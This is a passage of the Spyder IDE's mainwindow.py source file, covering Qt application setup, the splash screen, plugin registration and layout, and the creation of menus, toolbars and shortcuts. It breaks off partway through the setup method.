# mainwindow.py
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developed and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import re
import shutil
import signal
import socket
import glob
import subprocess
import sys
import threading
import traceback
import importlib
logger = logging.getLogger(__name__)
#==============================================================================
# Keeping a reference to the original sys.exit before patching it
#==============================================================================
ORIGINAL_SYS_EXIT = sys.exit
#==============================================================================
# Check requirements
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Windows only: support for hiding console window when started with python.exe
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Qt imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence, QPixmap
from qtpy.QtWidgets import (QAction, QApplication, QDesktopWidget, QDockWidget,
QMainWindow, QMenu, QMessageBox, QShortcut,
QSplashScreen, QStyleFactory, QWidget, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
# To catch font errors in QtAwesome
from qtawesome.iconic_font import FontError
#==============================================================================
# Proper high DPI scaling is available in Qt >= 5.6.0. This attribute must
# be set before creating the application.
#==============================================================================
from spyder.config.manager import CONF
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
#==============================================================================
# Get CLI options and set OpenGL backend. This attribute must
# be set before creating the application. See spyder-ide/spyder#11227
#==============================================================================
from spyder.app.utils import set_opengl_implementation
from spyder.app.cli_options import get_options
from spyder.config.base import running_under_pytest
# Get CLI options/args and make them available for future use.
# Ignore args if running tests or Spyder will try and fail to parse pytest's.
if running_under_pytest():
sys_argv = [sys.argv[0]]
CLI_OPTIONS, CLI_ARGS = get_options(sys_argv)
else:
CLI_OPTIONS, CLI_ARGS = get_options()
# **** Set OpenGL implementation to use ****
if CLI_OPTIONS.opengl_implementation:
option = CLI_OPTIONS.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
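# Illustrative note (not part of the original code): the backend selected here
# comes either from the ``--opengl`` command-line flag (e.g.
# ``spyder --opengl software``) or from the ('main', 'opengl') option, whose
# accepted values are normally 'automatic', 'desktop', 'software' or 'gles';
# the exact choices are defined by get_options() and
# set_opengl_implementation(), not here.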
#==============================================================================
# Create our QApplication instance here because it's needed to render the
# splash screen created below
#==============================================================================
from spyder.utils.qthelpers import qapplication
from spyder.config.base import get_image_path
MAIN_APP = qapplication()
if PYQT5:
APP_ICON = QIcon(get_image_path("spyder.svg"))
else:
APP_ICON = QIcon(get_image_path("spyder.png"))
MAIN_APP.setWindowIcon(APP_ICON)
#==============================================================================
# Create splash screen outside of MainWindow to reduce perceived startup time.
#==============================================================================
from spyder.config.base import _, get_image_path, DEV
if not running_under_pytest():
SPLASH = QSplashScreen(QPixmap(get_image_path('splash.svg')))
SPLASH_FONT = SPLASH.font()
SPLASH_FONT.setPixelSize(10)
SPLASH.setFont(SPLASH_FONT)
SPLASH.show()
SPLASH.showMessage(_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
else:
SPLASH = None
#==============================================================================
# Local utility imports
#==============================================================================
from spyder import (__version__, __project_url__, __forum_url__,
__trouble_url__, __website_url__, get_versions)
from spyder.app.utils import (get_python_doc_path, delete_lsp_log_files,
qt_message_handler, setup_logging)
from spyder.config.base import (get_conf_path, get_module_source_path, STDERR,
get_debug_level, MAC_APP_NAME, get_home_dir,
running_in_mac_app, get_module_path,
reset_config_files)
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.utils import IMPORT_EXT, is_anaconda, is_gtk_desktop
from spyder import dependencies
from spyder.py3compat import (is_text_string, to_text_string,
PY3, qbytearray_to_str, configparser as cp)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.programs import is_module_installed
from spyder.utils.misc import select_port, getcwd_or_home, get_python_executable
# TODO: Remove circular dependency between help and ipython console and remove
# this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
from spyder.config.gui import is_dark_font_color
#==============================================================================
# Local gui imports
#==============================================================================
# NOTE: Move (if possible) imports of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
try:
from spyder.utils.environ import WinUserEnvDialog
except ImportError:
WinUserEnvDialog = None # analysis:ignore
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri,
MENU_SEPARATOR, set_menu_icons)
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
from spyder.app.solver import find_external_plugins, solve_plugin_dependencies
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Third-party library imports
#==============================================================================
import qdarkstyle
#==============================================================================
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
#==============================================================================
CWD = getcwd_or_home()
#==============================================================================
# Install Qt message handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks
CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
BOOKMARKS = (
('Python2', "https://docs.python.org/2/index.html",
_("Python2 documentation")),
('Python3', "https://docs.python.org/3/index.html",
_("Python3 documentation")),
('numpy', "https://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "https://matplotlib.org/contents.html",
_("Matplotlib documentation")),
('PyQt5',
"https://www.riverbankcomputing.com/static/Docs/PyQt5/",
_("PyQt5 Reference Guide")),
('PyQt5',
"https://www.riverbankcomputing.com/static/Docs/PyQt5/module_index.html",
_("PyQt5 API Reference")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
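    # Hedged usage sketch (not in the original source): other components
    # typically react to these signals by connecting slots to them, e.g.::
    #
    #     main_window.sig_setup_finished.connect(my_plugin.on_main_ready)
    #     main_window.sig_pythonpath_changed.connect(
    #         my_plugin.update_interpreter_paths)
    #
    # ``my_plugin`` and its slot names above are hypothetical.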
# --- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name):
"""
        Return a plugin instance given the plugin's name.
"""
for name, plugin in self._PLUGINS.items():
if plugin_name == name:
return plugin
else:
raise SpyderAPIError('Plugin "{}" not found!'.format(plugin_name))
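    # Hedged usage sketch (not in the original source): fetching a registered
    # plugin by its name constant, e.g.::
    #
    #     console = main_window.get_plugin(Plugins.Console)
    #
    # A SpyderAPIError is raised if no plugin with that name was registered.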
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
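    # Illustrative example (not in the original source): show a transient
    # message for five seconds; the timeout is in milliseconds, as expected
    # by QStatusBar.showMessage::
    #
    #     main_window.show_status_message(_("Ready"), 5000)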
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.CONF_SECTION] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.CONF_SECTION] = plugin
else:
self._INTERNAL_PLUGINS[plugin.CONF_SECTION] = plugin
def register_plugin(self, plugin, external=False):
"""
Register a plugin in Spyder Main Window.
"""
        self.set_splash(_("Loading {}...").format(plugin.get_name()))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
        plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register()
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
toolbars = plugin.get_registered_application_toolbars()
for __, toolbar in toolbars.items():
            # TODO: Update this render call
toolbar._render()
self.toolbarslist.append(toolbar)
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
            plugin.sig_redirect_stdio_requested,
plugin.sig_status_message_requested,
]
for signal in signals:
try:
signal.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
        except Exception:
            shortcut = None
        if shortcut is not None:
self.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
try:
# New API
if (self.last_plugin is not None
and self.last_plugin.get_widget().is_maximized
and self.last_plugin is not plugin):
self.maximize_dockwidget()
except AttributeError:
# Old API
if (self.last_plugin is not None and self.last_plugin._ismaximized
and self.last_plugin is not plugin):
self.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
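    # Illustrative call (not in the original source): raising and focusing
    # the Help pane, assuming it was registered, would look like::
    #
    #     main_window.switch_to_plugin(main_window.help, force_focus=True)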
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
self.widgetlist.remove(plugin)
def tabify_plugin(self, plugin):
"""
Tabify the plugin using the list of possible TABIFY options.
        Only do this if the dockwidget does not already share its position
        with other dockwidgets and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
        # If TABIFY is not defined, tabify next to the Console by default
tabify = getattr(plugin, 'TABIFY', [self.get_plugin(Plugins.Console)])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf_option('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
plugin.set_conf_option('enable', True)
plugin.set_conf_option('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
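    # Hedged sketch (not part of the original code): a dockable plugin can
    # state where it prefers to be tabified by defining a TABIFY attribute
    # on its class, for example::
    #
    #     class MyPlugin(SpyderDockablePlugin):   # hypothetical plugin
    #         NAME = 'my_plugin'
    #         TABIFY = [Plugins.Help]             # try next to Help first
    #
    # When TABIFY is missing, tabify_plugin() above falls back to the Console.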
def handle_exception(self, error_data):
"""
        This method will call the handle exception method of the Console
        plugin. It is provided as a signal on the Plugin API for convenience,
        so that plugins do not need to explicitly call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
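    # Hedged sketch (not in the original source): a plugin reports an error
    # through the signal wired up in register_plugin(), which ends up calling
    # this method::
    #
    #     my_plugin.sig_exception_occurred.emit({
    #         "text": traceback.format_exc(),
    #         "is_traceback": True,
    #         "repo": "spyder-ide/spyder",   # hypothetical target repo
    #         "title": "Error while doing X",
    #         "label": "",
    #         "steps": "",
    #     })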
def __init__(self, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
if PYQT5:
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.dialog_manager = DialogManager()
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None:
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
                # Make Spyder quit when pressing Ctrl+C in the console.
                # In DEV mode Ctrl+C doesn't quit, because it helps to
                # capture the traceback when Spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
            with open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')) as f:
                mac_style = f.read()
            mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.ipyconsole = None
self.variableexplorer = None
self.plots = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
# File switcher
self.switcher = None
        # Check for updates Thread and Worker, references needed to prevent
        # segfaulting
self.check_updates_action = None
self.thread_updates = None
self.worker_updates = None
self.give_updates_feedback = True
# Preferences
from spyder.preferences.general import MainConfigPage
from spyder.preferences.maininterpreter import MainInterpreterConfigPage
self.general_prefs = [MainConfigPage, MainInterpreterConfigPage]
self.prefs_index = None
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
self._report_dlg = None
# Quick Layouts and Dialogs
from spyder.preferences.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_interface_action = None
self.show_toolbars_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.file_menu = None
self.file_menu_actions = []
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.tools_menu = None
self.tools_menu_actions = []
self.external_tools_menu = None # We must keep a reference to this,
# otherwise the external tools menu is lost after leaving setup method
self.external_tools_menu_actions = []
self.view_menu = None
self.plugins_menu = None
self.plugins_menu_actions = []
self.toolbars_menu = None
self.help_menu = None
self.help_menu_actions = []
# Status bar widgets
self.conda_status = None
self.mem_status = None
self.cpu_status = None
self.clock_status = None
# Toolbars
self.visible_toolbars = []
self.toolbarslist = []
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.edit_toolbar = None
self.edit_toolbar_actions = []
self.search_toolbar = None
self.search_toolbar_actions = []
self.source_toolbar = None
self.source_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.layout_toolbar = None
self.layout_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
# Set window title
self.set_window_title()
        if set_windows_appusermodelid is not None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_travis = os.environ.get('TEST_CI_APP', None)
if test_travis is not None:
global MAIN_APP
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(MAIN_APP.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = SPLASH
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.interface_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
        # The following flag remembers the maximized state even when
        # the window is in fullscreen mode:
self.maximized_flag = None
# The following flag is used to restore window's geometry when
# toggling out of fullscreen mode in Windows.
self.saved_normal_geometry = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError as e:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: #555555\'><b>netsh winsock reset"
"</b></span><br>"))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# Apply preferences
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
"""Create and return toolbar with *title* and *object_name*"""
toolbar = self.addToolBar(title)
toolbar.setObjectName(object_name)
toolbar.setIconSize(QSize(iconsize, iconsize))
self.toolbarslist.append(toolbar)
return toolbar
def _update_shortcuts_in_panes_menu(self, show=True):
"""
        Display the shortcut for the "Switch to plugin..." on the toggle view
        action of the plugins displayed in the View/Panes menu.
        Notes
        -----
        SpyderDockablePlugins provide two actions that function as a single
        action. The `Switch to Plugin...` action has an assignable shortcut
        via the shortcut preferences. The `Plugin toggle View` in the `View`
        application menu uses a custom `Toggle view action` that displays the
        shortcut assigned to the `Switch to Plugin...` action, but is not
        triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window"""
logger.info("*** Start of MainWindow setup ***")
logger.info("Creating toolbars...")
# File menu/toolbar
self.file_menu = self.menuBar().addMenu(_("&File"))
self.file_toolbar = self.create_toolbar(_("File toolbar"),
"file_toolbar")
# Edit menu/toolbar
self.edit_menu = self.menuBar().addMenu(_("&Edit"))
self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
"edit_toolbar")
# Search menu/toolbar
self.search_menu = self.menuBar().addMenu(_("&Search"))
self.search_toolbar = self.create_toolbar(_("Search toolbar"),
"search_toolbar")
# Source menu/toolbar
self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
self.source_toolbar = self.create_toolbar(_("Source toolbar"),
"source_toolbar")
# Run menu/toolbar
self.run_menu = self.menuBar().addMenu(_("&Run"))
self.run_toolbar = self.create_toolbar(_("Run toolbar"),
"run_toolbar")
# Debug menu/toolbar
self.debug_menu = self.menuBar().addMenu(_("&Debug"))
self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
"debug_toolbar")
# Consoles menu/toolbar
self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
# Projects menu
self.projects_menu = self.menuBar().addMenu(_("&Projects"))
self.projects_menu.aboutToShow.connect(self.valid_project)
# Tools menu
self.tools_menu = self.menuBar().addMenu(_("&Tools"))
# View menu
self.view_menu = self.menuBar().addMenu(_("&View"))
self.view_menu.aboutToShow.connect(
lambda: self._update_shortcuts_in_panes_menu(True))
self.view_menu.aboutToHide.connect(
lambda: self._update_shortcuts_in_panes_menu(False))
# Help menu
self.help_menu = self.menuBar().addMenu(_("&Help"))
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
css_path = CSS_PATH
else:
css_path = CSS_PATH
# Shortcuts plugin
from spyder.plugins.shortcuts.plugin import Shortcuts
self.shortcuts = Shortcuts(self, configuration=CONF)
self.register_plugin(self.shortcuts)
logger.info("Creating core actions...")
self.close_dockwidget_action = create_action(
self, icon=ima.icon('close_pane'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut
)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_interface_action = create_action(
self,
(_("Unlock panes and toolbars") if self.interface_locked else
_("Lock panes and toolbars")),
icon=ima.icon('lock' if self.interface_locked else 'lock_open'),
triggered=lambda checked:
self.toggle_lock(not self.interface_locked),
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_interface_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
self.file_toolbar_actions = [self.file_switcher_action,
self.symbol_finder_action]
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
logger.info("Creating Tools menu...")
# Tools + External Tools
prefs_action = create_action(self, _("Pre&ferences"),
icon=ima.icon('configure'),
